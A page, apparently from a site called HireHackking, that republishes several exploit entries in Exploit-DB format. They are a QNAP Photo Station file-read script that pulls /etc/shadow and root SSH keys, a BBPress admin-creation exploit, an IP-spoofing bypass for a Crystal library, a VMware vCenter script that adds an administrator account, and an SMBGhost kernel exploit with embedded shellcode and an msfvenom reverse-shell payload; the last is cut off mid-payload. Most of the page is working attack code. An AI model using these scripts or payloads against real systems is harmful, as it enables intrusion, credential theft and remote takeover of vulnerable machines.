HireHackking

# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution # Exploit Author: Yunus YILDIRIM (Th3Gundy) # Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com # Date: 2020-05-28 # Vendor Homepage: https://www.qnap.com # Version: QTS < 4.4.1 | Photo Station < 6.0.3 # CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195 # References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit # References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e # References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 ###################################################################### ###################################################################### #!/usr/bin/python3 __author__ = "Yunus YILDIRIM (@Th3Gundy)" __version__ = "0.1" import requests import re, sys # hide ssl error from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def get_banner(): print("""\033[91m █████ ███▄ █ ▄▄▄ ██▓███ ▒██▓ ██▒ ██ ▀█ █ ▒████▄ ▓██░ ██▒ ▒██▒ ██░▓██ ▀█ ██▒▒██ ▀█▄ ▓██░ ██▓▒ ░██ █▀ ░▓██▒ ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒ ░▒███▒█▄ ▒██░ ▓██░ ▓█ ▓██▒▒██▒ ░ ░ ░░ ▒▒░ ▒ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ░ ▒░ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░░▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ \033[0m \033[94m {0} \033[0m """.format(__author__)) def get_file_content(file): post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file} file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10) print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text)) # print banner get_banner() if len(sys.argv) != 2: print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m") sys.exit(-1) url = sys.argv[1].rstrip('/') headers = {"User-Agent": "Gundy - QNAP RCE"} # for session cookie req = requests.Session() ####################################################################### # search album_id print("="*65) post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'} album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10) if album_id_response.status_code != 200: print("album id not found \n\033[91mnot vulnerable\033[0m") sys.exit(0) album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group() print("album_id ==> " + album_id) ####################################################################### # search $_SESSION['access_code'] access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10) if access_code_response.status_code != 200: print("slideshow not found \n\033[91mnot vulnerable\033[0m") sys.exit(0) access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group() print("access_code ==> " + access_code) ####################################################################### # /etc/passwd file read get_file_content('./../../../../../etc/passwd') # /etc/shadow read get_file_content('./../../../../../etc/shadow') # /etc/hostname read get_file_content('./../../../../../etc/hostname') # /root/.ssh/id_rsa read get_file_content('./../../../../../root/.ssh/id_rsa') #######################################################################

# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation # Date: 2020-05-29 # Exploit Author: Raphael Karger # Software Link: https://codex.bbpress.org/releases/ # Version: BBPress < 2.5 # CVE: CVE-2020-13693 import argparse import requests import bs4 import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) useragent = {"User-Agent" : "This is a real browser i swear"} def grab_nonce_login_page(url): try: login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent) soup = bs4.BeautifulSoup(login_page_request.text, "lxml") action = soup.find("form", class_="bbp-login-form") wp_login_page = action.get("action") wp_nonce = action.find("input", id="_wpnonce").get("value") return (wp_nonce, wp_login_page) except Exception as nonce_error: print("[-] Nonce Error: '{}'".format(nonce_error)) return False def exploit(url, username, password, email): info = grab_nonce_login_page(url) if info: nonce = info[0] login_page = info[1] try: return requests.post(login_page, data={ "user_login" : username, "user_pass" : password, "user_email" : email, "user-submit" : "", "user-cookie" : "1", "_wpnonce" : nonce, "bbp-forums-role" : "bbp_keymaster" }, allow_redirects=False, verify=False, timeout=10, headers=useragent) except Exception as e: print("[-] Error Making Signup Post Request: '{}'".format(e)) return False if __name__ == "__main__": exit("asdasd") parser = argparse.ArgumentParser() parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks") parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123") parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com") parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True) args = parser.parse_args() site_exploit = exploit(args.url, args.username, args.password, args.email) if site_exploit and site_exploit.status_code == 302: exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password)) print("[-] Exploit Failed")

# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass # Exploit Author : Halis Duraki (@0xduraki) # Date : 2020-05-28 # Product : http-protection (Crystal Shard) # Product URI : https://github.com/rogeriozambon/http-protection # Version : http-protection <= 0.2.0 # CVE : N/A ## About the product This library/shard (http-protection) protects against typical web attacks with-in Crystal applications. It was inspired by rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the Shard get the traction on Crystal official channels (Crystals' ANN, Gitter, and Shardbox). ## About the exploit The `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent it). Both of this functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting difference between IP addr values of `X-Forwarded-For` & `X-Real-IP/X-Client-IP`. If the values mismatch, the middleware protects the application by forcing `403 (Forbidden)` response. Relevant code (src/http-protection/ip_spoofing.cr): ``` module HTTP::Protection class IpSpoofing ... def call(... ctx) ... ips = headers["X-Forwarded-For"].split(/\s*,\s*/) return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"]) return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"]) ... end end end ``` The exploit works by hardcoding the values in all protection request headers following the same const IP Address. The standard format for `X-Forwarded-For` from MDN reference those values as: `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls. @see CWE-16: https://cwe.mitre.org/data/definitions/16.html ## PoC (Proof of Concept) * Set a breakpoint on the request, or intercept request. * Hardcore all three request headers: * X-Forwarded-For: 123.123.123.123 * X-Client-IP: 123.123.123.123 * X-Real-IP: 123.123.123.123 * Continue request. * Response should be 200 OK, otherwise, 400 Forbidden. ++ Request example (POC): ``` GET / HTTP/1.1 Host: localhost.:8081 X-Forwarded-For: 123.123.123.123 X-Client-IP: 123.123.123.123 X-Real-IP: 123.123.123.123 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache ``` ++ Response (POC): ``` 200 OK ```` ## Fix It is advised to fix the IpSpoofing detection via checking socket data directly instead of relying on passed header key/vals. The other solution is to force proxy to dismiss such data (on request) and use original source (proxified). ============================================================================================================== + Halis Duraki | duraki@linuxmail.org | @0xduraki | https://duraki.github.io ==============================================================================================================

# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass # Date: 2020-06-01 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html # Version: vCenter Server 6.7 before update 3f # Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) # CVE: CVE-2020-3952 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 File name CVE-2020-3592.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: exploit + vulnerability checker ''' import binascii, socket, sys, string, random ## Default vars; change at will _sIP = '192.168.50.35' _iPORT = 389 _iTIMEOUT = 5 def randomString(iStringLength=8): #sLetters = string.ascii_lowercase sLetters = string.ascii_letters return ''.join(random.choice(sLetters) for i in range(iStringLength)) def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed sReturn = sPrefix if (len(sData) / 2 ) > 255: sReturn += b'82' hexBytes = 2 elif (len(sData) /2 ) >= 128: sReturn += b'81' sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() return sReturn def buildBindRequestPacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) ## Packet Construction sPacket = getLengthPrefix(sPass, b'80') + sPass sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket sPacket = b'020103' + sPacket sPacket = getLengthPrefix(sPacket, b'60') + sPacket sPacket = b'020101' + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildUserCreatePacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) def createAttribute(sName, sValue): sValue = getLengthPrefix(sValue, b'04') + sValue sName = getLengthPrefix(sName, b'04') + sName sReturn = getLengthPrefix(sValue, b'31') + sValue sReturn = sName + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn def createObjectClass(): sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') sReturn = getLengthPrefix(sReturn, b'31') + sReturn sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn ## Attributes sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) sAttributes += createObjectClass() sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) ## CN sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') sUserEntry = getLengthPrefix(sCN, b'04') + sCN ## Packet Assembly (bottom up) sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes sPacket = sUserEntry + sPacket sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildModifyUserPacket(sUser): sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') sMember = binascii.hexlify(b'member') ## Packet Construction sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN sPacket = getLengthPrefix(sPacket, b'31') + sPacket sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def performBind(s): ## Trying to bind, fails, but necessary (even fails when using correct credentials) dPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') s.send(dPacket) sResponse = s.recv(1024) try: sResponse = sResponse.split(b'\x04\x00')[0][-1:] sCode = binascii.hexlify(sResponse).decode() if sCode == '31': print('[+] Ok, service reachable, continuing') else: print('[-] Something went wrong') except: pass return sCode def performUserAdd(s, sUser, sPass): dPacket = buildUserCreatePacket(sUser,sPass) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() print('[-] Error, user not added, message received: ' + sMessage) except: pass return sCode def performUserMod(s, sUser, verbose = True): dPacket = buildModifyUserPacket(sUser) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': if verbose: print('[+] User modification success (if the above is OK).') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() if verbose: print('[-] Error during modification, message received: ' + sMessage) except: pass return sCode, sMessage def performUnbind(s): try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') except: pass def main(): global _sIP, _iPORT, _iTIMEOUT _sUSER = 'user_' + randomString(6) _sPASS = randomString(8) + '_2020' bAdduser = False if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) print(' Leave username & password empty for a vulnerability check') print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') if not sAnswer == '': _sIP = sAnswer sAnswer = input('[?] Want to perform a check only? [Y/n]: ') if sAnswer.lower() == 'n': bAdduser = True if bAdduser: sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') if not sAnswer == '': _sUSER = sAnswer sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') if not sAnswer == '': _sPASS = sAnswer else: _sIP = sys.argv[1] if len(sys.argv) >= 3: _sUSER = sys.argv[2] bAdduser = True if len(sys.argv) >= 4: _sPASS = sys.argv[3] ## MAIN print('') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(_iTIMEOUT) try: s.connect((_sIP,_iPORT)) except: print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') sys.exit(1) performBind(s) if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS) if not bAdduser: print('[!] Checking vulnerability') sCode, sMessage = performUserMod(s, 'Administrator', False) if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) else: print('[+] This host is vulnerable!') else: sCode = performUserMod(s, _sUSER) performUnbind(s) s.close() if __name__ == "__main__": main()

#!/usr/bin/env python ''' # EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48537.zip # SMBGhost_RCE_PoC RCE PoC for CVE-2020-0796 "SMBGhost" For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. Now that that's out of the way.... Usage ex: ``` $SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131 [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly... ``` Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer header without causing a crash. See this excellent write up by Ricera Security for more details on the methods I used: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html ''' import sys import socket import struct import argparse from lznt1 import compress, compress_evil from smb_win import smb_negotiate, smb_compress # Use lowstub jmp bytes to signature search LOWSTUB_JMP = 0x1000600E9 # Offset of PML4 pointer in lowstub PML4_LOWSTUB_OFFSET = 0xA0 # Offset of lowstub virtual address in lowstub SELFVA_LOWSTUB_OFFSET = 0x78 # Offset of NTOSKRNL entry address in lowstub NTENTRY_LOWSTUB_OFFSET = 0x278 # Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78 KUSER_SHARED_DATA = 0xFFFFF78000000000 # Offset of pNetRawBuffer in SRVNET_BUFFER_HDR PNET_RAW_BUFF_OFFSET = 0x18 # Offset of pMDL1 in SRVNET_BUFFER_HDR PMDL1_OFFSET = 0x38 # Shellcode from kernel_shellcode.asm KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C" KERNEL_SHELLCODE += b"\x8D\x35\xA0\x02\x00\x00\x49\x8B\x86\xD0\x00\x00\x00\x49\x8B\x9E" KERNEL_SHELLCODE += b"\xD8\x00\x00\x00\x48\x89\x18\xFB\x49\x8B\x86\xE0\x00\x00\x00\x48" KERNEL_SHELLCODE += b"\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49\x89\xC7\x4D" KERNEL_SHELLCODE += b"\x89\xBE\xE0\x00\x00\x00\xBF\x78\x7C\xF4\xDB\xE8\xDA\x00\x00\x00" KERNEL_SHELLCODE += b"\x49\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x2E\x01\x00\x00\x48\x89\xC1" KERNEL_SHELLCODE += b"\xBF\xE1\x14\x01\x17\xE8\x21\x01\x00\x00\x48\x89\xC2\x48\x83\xC2" KERNEL_SHELLCODE += b"\x08\x49\x8D\x74\x0D\x00\xE8\xFF\x00\x00\x00\x3D\xD8\x83\xE0\x3E" KERNEL_SHELLCODE += b"\x74\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18" KERNEL_SHELLCODE += b"\xB8\x4C\x89\xE9\xE8\x91\x00\x00\x00\x49\x89\x06\x4D\x8B\x4D\x30" KERNEL_SHELLCODE += b"\x4D\x8B\x45\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81" KERNEL_SHELLCODE += b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C" KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\xF8\x02\x00\x00\x75\xDE" KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x40\x49\x8D\x4E\x08\x48\x89\xF2\x4D\x31\xC0\x4C" KERNEL_SHELLCODE += b"\x8D\x0D\xB9\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C" KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x2F\x00\x00\x00\x48\x83\xC4\x40\x49" KERNEL_SHELLCODE += b"\x8D\x4E\x08\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x19\x00\x00" KERNEL_SHELLCODE += b"\x00\x48\x83\xC4\x20\xFA\x48\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E" KERNEL_SHELLCODE += b"\x41\x5F\x41\x5D\x41\x59\x41\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF" KERNEL_SHELLCODE += b"\xE0\x53\x51\x56\x41\x8B\x47\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00" KERNEL_SHELLCODE += b"\x00\x4C\x01\xF8\x50\x8B\x48\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9" KERNEL_SHELLCODE += b"\x8B\x34\x8B\x4C\x01\xFE\xE8\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58" KERNEL_SHELLCODE += b"\x8B\x58\x24\x4C\x01\xFB\x66\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB" KERNEL_SHELLCODE += b"\x8B\x04\x8B\x4C\x01\xF8\x5E\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1" KERNEL_SHELLCODE += b"\xCA\x0D\x01\xC2\x85\xC0\x75\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF" KERNEL_SHELLCODE += b"\x80\x78\x02\x80\x77\x05\x0F\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41" KERNEL_SHELLCODE += b"\x57\x41\x56\x57\x56\x48\x8B\x05\x0A\x01\x00\x00\x48\x8B\x48\x18" KERNEL_SHELLCODE += b"\x48\x8B\x49\x20\x48\x8B\x09\x66\x83\x79\x48\x18\x75\xF6\x48\x8B" KERNEL_SHELLCODE += b"\x41\x50\x81\x78\x0C\x33\x00\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF" KERNEL_SHELLCODE += b"\x5E\x51\x5E\x83\xE8\x58\xFF\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xB3" KERNEL_SHELLCODE += b"\x01\x00\x00\x31\xC0\x44\x0F\x22\xC0\x48\x8D\x15\x8E\x01\x00\x00" KERNEL_SHELLCODE += b"\x89\xC1\x48\xF7\xD1\x49\x89\xC0\xB0\x40\x50\xC1\xE0\x06\x50\x49" KERNEL_SHELLCODE += b"\x89\x01\x48\x83\xEC\x20\xBF\xEA\x99\x6E\x57\xE8\x1A\xFF\xFF\xFF" KERNEL_SHELLCODE += b"\x48\x83\xC4\x30\x48\x8B\x3D\x63\x01\x00\x00\x48\x8D\x35\x77\x00" KERNEL_SHELLCODE += b"\x00\x00\xB9\x1D\x00\x00\x00\xF3\xA4\x48\x8D\x35\x6E\x01\x00\x00" KERNEL_SHELLCODE += b"\xB9\x58\x02\x00\x00\xF3\xA4\x48\x8D\x0D\xD8\x00\x00\x00\x65\x48" KERNEL_SHELLCODE += b"\x8B\x14\x25\x88\x01\x00\x00\x4D\x31\xC0\x4C\x8D\x0D\x46\x00\x00" KERNEL_SHELLCODE += b"\x00\x41\x50\x6A\x01\x48\x8B\x05\x22\x01\x00\x00\x50\x41\x50\x48" KERNEL_SHELLCODE += b"\x83\xEC\x20\xBF\xC4\x5C\x19\x6D\xE8\xBD\xFE\xFF\xFF\x48\x83\xC4" KERNEL_SHELLCODE += b"\x40\x48\x8D\x0D\x9E\x00\x00\x00\x4C\x89\xF2\x4D\x31\xC9\xBF\x34" KERNEL_SHELLCODE += b"\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x9E\xFE\xFF\xFF\x48\x83\xC4\x20" KERNEL_SHELLCODE += b"\x5E\x5F\x41\x5E\x41\x5F\xC3\x90\xC3\x48\x92\x31\xC9\x51\x51\x49" KERNEL_SHELLCODE += b"\x89\xC9\x4C\x8D\x05\x0D\x00\x00\x00\x89\xCA\x48\x83\xEC\x20\xFF" KERNEL_SHELLCODE += b"\xD0\x48\x83\xC4\x30\xC3\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x00" KERNEL_SHELLCODE += b"\x00\x00\x00\x00\x00\x00" # Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit? USER_PAYLOAD = b"" USER_PAYLOAD += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" USER_PAYLOAD += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" USER_PAYLOAD += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" USER_PAYLOAD += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" USER_PAYLOAD += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" USER_PAYLOAD += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b" USER_PAYLOAD += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0" USER_PAYLOAD += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56" USER_PAYLOAD += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" USER_PAYLOAD += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" USER_PAYLOAD += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58" USER_PAYLOAD += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" USER_PAYLOAD += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0" USER_PAYLOAD += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" USER_PAYLOAD += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" USER_PAYLOAD += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32" USER_PAYLOAD += b"\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec" USER_PAYLOAD += b"\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x7a\x69" USER_PAYLOAD += b"\xc0\xa8\x8e\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41" USER_PAYLOAD += b"\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01" USER_PAYLOAD += b"\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50" USER_PAYLOAD += b"\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48" USER_PAYLOAD += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5" USER_PAYLOAD += b"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9" USER_PAYLOAD += b"\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02" USER_PAYLOAD += b"\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41" USER_PAYLOAD += b"\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a" USER_PAYLOAD += b"\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" USER_PAYLOAD += b"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50" USER_PAYLOAD 